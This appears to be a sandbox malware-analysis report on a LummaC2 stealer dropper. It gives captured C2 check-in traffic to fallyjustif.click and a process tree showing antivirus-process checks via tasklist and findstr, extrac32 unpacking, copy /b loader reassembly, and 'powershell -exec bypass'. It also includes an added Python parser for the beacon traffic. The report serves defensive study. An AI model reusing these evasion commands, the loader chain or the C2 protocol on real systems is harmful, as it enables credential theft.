                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aMyEeA1SBZjLZBaKCHpt6RNwDZVwohhyE3iwCcZVona0S4pYgB4WNFESIWw4NYB6DOamPN6IxZLKpGTXwN9hP3y3hglsAbnV7vNOr6iGpNb9hWkNOcOm662ngh9PoFQlwbIoRg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f94574edcd08c6c-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1883&min_rtt=1848&rtt_var=718&sent=332&recv=612&lost=0&retrans=0&sent_bytes=2841&recv_bytes=590407&delivery_rate=1580086&cwnd=168&unsent_bytes=0&cid=8443bb300c309502&ts=1909&x=0"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.5 | 49831 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:13 UTC | 265 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 84
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:13 UTC | 84 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d 26 68 77 69 64 3d 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41
                                                            Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl1new1&j=&hwid=1B77142E387E90721441EDD8E05CE3DA
                                                            2024-12-28 20:36:14 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:14 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=2frptjehdmqhi361pc9hlhljhk; expires=Wed, 23 Apr 2025 14:22:53 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nNrDK9kVgYJOWueoLLpulzFUe87%2FYLVl8cJAFa7f8fdKGENQvTYFc9Fe1NY9LUg0ME0yomejX8mybRnEYB4zdKzXV1rX5VH1DiL5xCNaItP6ERefrcKP%2F8kYZ8miAj8Sp%2BkIQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945762ec977293-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1803&rtt_var=691&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=985&delivery_rate=1567364&cwnd=158&unsent_bytes=0&cid=477a27922ed83265&ts=789&x=0"
                                                            2024-12-28 20:36:14 UTC | 126 | IN | Data Raw: 37 38 0d 0a 68 56 4f 49 78 51 58 51 79 4e 54 73 6c 49 6b 78 58 58 6d 45 51 49 52 77 77 77 4d 51 37 71 4f 44 47 37 46 59 42 70 46 6a 70 42 66 65 4b 4b 71 77 4a 2b 72 71 76 4a 6a 67 2b 55 4a 6e 4a 61 73 63 71 77 4b 6d 62 57 53 63 32 71 31 34 33 67 51 70 39 77 62 4c 59 75 41 6b 37 66 42 5a 2f 37 71 31 6d 37 61 6c 45 7a 73 4e 70 6e 71 32 58 4f 46 6d 4d 74 53 54 2f 6b 59 3d 0d 0a
                                                            Data Ascii: 78hVOIxQXQyNTslIkxXXmEQIRwwwMQ7qODG7FYBpFjpBfeKKqwJ+rqvJjg+UJnJascqwKmbWSc2q143gQp9wbLYuAk7fBZ/7q1m7alEzsNpnq2XOFmMtST/kY=
                                                            2024-12-28 20:36:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.5 | 49836 | 172.67.75.40 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:15 UTC | 196 | OUT | GET /feouewe5/raw HTTP/1.1
                                                            Connection: Keep-Alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Host: rentry.co
                                                            2024-12-28 20:36:16 UTC | 918 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:16 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            vary: Origin
                                                            x-xss-protection: 1; mode=block
                                                            x-content-type-options: nosniff
                                                            strict-transport-security: max-age=31536000; includeSubDomains
                                                            Cache-Control: Vary
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5gr%2B5F9RaG79UfgVFTswxD%2Bkc%2Fczbr4CxVmwIQAoejbg2SiSqIptir7AQFa74PYF3oEyVMmYbv36IN5IJJVgKCF7qw55MxPH%2BlRYjQ1CN84YWjX5YftTb2mlQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945770eee0c34d-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1709&min_rtt=1706&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1683967&cwnd=252&unsent_bytes=0&cid=14dbbc553ba22a62&ts=816&x=0"
                                                            2024-12-28 20:36:16 UTC | 451 | IN | Data Raw: 31 36 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65
                                                            Data Ascii: 161b<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
                                                            2024-12-28 20:36:16 UTC | 1369 | IN | Data Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67
                                                            Data Ascii: eta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta name="twitter:imag
                                                            2024-12-28 20:36:16 UTC | 1369 | IN | Data Raw: 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74
                                                            Data Ascii: tem("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rent
                                                            2024-12-28 20:36:16 UTC | 1369 | IN | Data Raw: 73 20 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20 69 6e 74 6f 20 61 20 6c 6f 74 20 6f 66 20 74 72 6f
                                                            Data Ascii: s access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us into a lot of tro
                                                            2024-12-28 20:36:16 UTC | 1109 | IN | Data Raw: 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65
                                                            Data Ascii: ript><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.create
                                                            2024-12-28 20:36:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0
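Sessions 6 and 7 above are the stealer's check-in with fallyjustif.click: a multipart/form-data POST whose first three fields are hwid, pid and lid (the rest of the 587822-byte body is a binary blob the dump only shows as hex), followed by a form-urlencoded act=get_message beacon that repeats the same lid and hwid, answered with a chunked, base64-encoded body. Session 8, the GET to rentry.co/feouewe5/raw, returned rentry's generic "What" page (title What, canonical https://rentry.co/what, text about needing an access code for /raw/) rather than paste content, so there is nothing to parse there. The Python below is an added example for analysts working from this kind of capture; it is not Joe Sandbox or LummaC code. The multipart body is reconstructed from the visible fields, with the closing boundary assumed because the dump is cut after lid; the beacon body and the 126-byte response are verbatim from the report. Only the base64 layer of the response is known from the page, so the decoded 89 bytes are left opaque.

```python
"""Parse the LummaC2 check-in traffic shown in sessions 6 and 7.

Added example; not Joe Sandbox or LummaC code. Inputs are reconstructed
from the Data Ascii lines of the report (see comments for assumptions).
"""
import base64
import re
from urllib.parse import parse_qs

BOUNDARY = "RI5EHQNV84U"

# Constructed: the three text fields exactly as session 6 shows them. The
# report truncates the body after "lid", so the closing boundary is assumed
# and the large file part that followed it is omitted.
MULTIPART_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="hwid"\r\n\r\n'
    '1B77142E387E90721441EDD8E05CE3DA\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="pid"\r\n\r\n'
    '1\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="lid"\r\n\r\n'
    'MeHdy4--pl1new1\r\n'
    f'--{BOUNDARY}--\r\n'
).encode()

# Session 7 request body and response body, verbatim from the report.
BEACON_BODY = (
    b"act=get_message&ver=4.0&lid=MeHdy4--pl1new1&j=&hwid="
    b"1B77142E387E90721441EDD8E05CE3DA"
)
CHUNKED_RESPONSE = (
    b"78\r\n"
    b"hVOIxQXQyNTslIkxXXmEQIRwwwMQ7qODG7FYBpFjpBfeKKqwJ+rqvJjg+UJnJascqwKmbWSc2q143gQp9wbLYuAk7fBZ/7q1m7alEzsNpnq2XOFmMtST/kY="
    b"\r\n0\r\n\r\n"
)

_FIELD_RE = re.compile(rb'name="([^"]+)"\r\n\r\n(.*?)\r\n', re.S)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {name: value} for the text fields of a multipart/form-data body."""
    fields = {}
    for part in body.split(b"--" + boundary.encode()):
        if b"filename=" in part:  # binary file parts are not decoded here
            continue
        m = _FIELD_RE.search(part)
        if m:
            fields[m.group(1).decode()] = m.group(2).decode()
    return fields


def parse_beacon(body: bytes) -> dict:
    """Parse the application/x-www-form-urlencoded beacon, keeping the empty j=."""
    return {k: v[0] for k, v in parse_qs(body.decode(), keep_blank_values=True).items()}


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex size CRLF data CRLF ... 0 CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)
        if size == 0:
            return bytes(out)
        data_start = eol + 2
        out += body[data_start:data_start + size]
        pos = data_start + size + 2


def summarize(multipart: bytes, beacon: bytes, response: bytes) -> dict:
    """Cross-check the identifiers the stealer sends in both requests."""
    fields = parse_multipart(multipart, BOUNDARY)
    q = parse_beacon(beacon)
    # Only the base64 layer is visible in the capture; the decoded bytes stay opaque.
    blob = base64.b64decode(dechunk(response))
    return {
        "hwid": fields["hwid"],
        "lid": fields["lid"],
        "pid": fields["pid"],
        "act": q["act"],
        "ver": q["ver"],
        "ids_consistent": fields["hwid"] == q["hwid"] and fields["lid"] == q["lid"],
        "response_bytes": len(blob),
    }


if __name__ == "__main__":
    for k, v in summarize(MULTIPART_BODY, BEACON_BODY, CHUNKED_RESPONSE).items():
        print(f"{k}: {v}")
```

The hwid and lid values are the pivot points: the same pair appears in the upload and in the beacon, so either one is enough to tie further captures from this host or build to the same campaign.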


                                                            Target ID:0
                                                            Start time:15:35:00
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\!Set-up..exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\!Set-up..exe"
                                                            Imagebase:0x400000
                                                            File size:14'866'519 bytes
                                                            MD5 hash:27968EEBCB115C6ECB62199A98CE9EE6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:35:01
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Campaigns Campaigns.cmd & Campaigns.cmd
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:15:35:01
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:tasklist
                                                            Imagebase:0xe80000
                                                            File size:79'360 bytes
                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /I "opssvc wrsa"
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:tasklist
                                                            Imagebase:0xe80000
                                                            File size:79'360 bytes
                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:15:35:03
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:15:35:04
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c md 71992
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:15:35:04
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:extrac32 /Y /E Ec
                                                            Imagebase:0x8d0000
                                                            File size:29'184 bytes
                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:findstr /V "Ratio" Returning
                                                            Imagebase:0xeb0000
                                                            File size:29'696 bytes
                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c copy /b 71992\Banned.com + Fwd + Rise + Designed + Balanced + Available + Dir + Soccer + Race + Ford + Writing 71992\Banned.com
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:cmd /c copy /b ..\Bids + ..\Ceo + ..\Throat + ..\Hall + ..\Access + ..\Availability + ..\Scout + ..\War V
                                                            Imagebase:0x790000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Wow64 process (32bit):true
                                                            Commandline:Banned.com V
                                                            Imagebase:0x6b0000
                                                            File size:947'288 bytes
                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:15:35:05
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:choice /d y /t 5
                                                            Imagebase:0xa10000
                                                            File size:28'160 bytes
                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:15:36:15
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1"
                                                            Imagebase:0x700000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:15:36:16
                                                            Start date:28/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6d64d0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

Execution Graph

Execution Coverage: 18.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.9%
Total number of Nodes: 1481
Total number of Limit Nodes: 26
4767->4768 4769 4062b6 4768->4769 4770 406288 wsprintfW 4768->4770 4771 402991 4769->4771 4772 4062bf lstrcatW 4769->4772 4770->4769 4770->4770 4771->4766 4772->4771 4773 403d02 4774 403d0d 4773->4774 4775 403d11 4774->4775 4776 403d14 GlobalAlloc 4774->4776 4776->4775 4777 402082 4778 401446 18 API calls 4777->4778 4779 402093 SetWindowLongW 4778->4779 4780 4030e3 4779->4780 4781 402a84 4782 401553 19 API calls 4781->4782 4783 402a8e 4782->4783 4784 401446 18 API calls 4783->4784 4785 402a98 4784->4785 4786 401a13 4785->4786 4787 402ab2 RegEnumKeyW 4785->4787 4788 402abe RegEnumValueW 4785->4788 4789 402a7e 4787->4789 4788->4786 4788->4789 4789->4786 4790 4029e4 RegCloseKey 4789->4790 4790->4786 4791 402c8a 4792 402ca2 4791->4792 4793 402c8f 4791->4793 4795 40145c 18 API calls 4792->4795 4794 401446 18 API calls 4793->4794 4797 402c97 4794->4797 4796 402ca9 lstrlenW 4795->4796 4796->4797 4798 401a13 4797->4798 4799 402ccb WriteFile 4797->4799 4799->4798 4800 401d8e 4801 40145c 18 API calls 4800->4801 4802 401d95 ExpandEnvironmentStringsW 4801->4802 4803 401da8 4802->4803 4804 401db9 4802->4804 4803->4804 4805 401dad lstrcmpW 4803->4805 4805->4804 4806 401e0f 4807 401446 18 API calls 4806->4807 4808 401e17 4807->4808 4809 401446 18 API calls 4808->4809 4810 401e21 4809->4810 4811 4030e3 4810->4811 4813 405f7d wsprintfW 4810->4813 4813->4811 4814 40438f 4815 4043c8 4814->4815 4816 40439f 4814->4816 4817 403df6 8 API calls 4815->4817 4818 403d6b 19 API calls 4816->4818 4820 4043d4 4817->4820 4819 4043ac SetDlgItemTextW 4818->4819 4819->4815 4821 403f90 4822 403fa0 4821->4822 4823 403fbc 4821->4823 4832 405cb0 GetDlgItemTextW 4822->4832 4825 403fc2 SHGetPathFromIDListW 4823->4825 4826 403fef 4823->4826 4828 403fd2 4825->4828 4831 403fd9 SendMessageW 4825->4831 4827 403fad SendMessageW 4827->4823 4829 40141d 80 API calls 4828->4829 4829->4831 4831->4826 4832->4827 4833 402392 4834 40145c 18 API calls 4833->4834 4835 402399 4834->4835 4838 407224 4835->4838 4839 406efe 
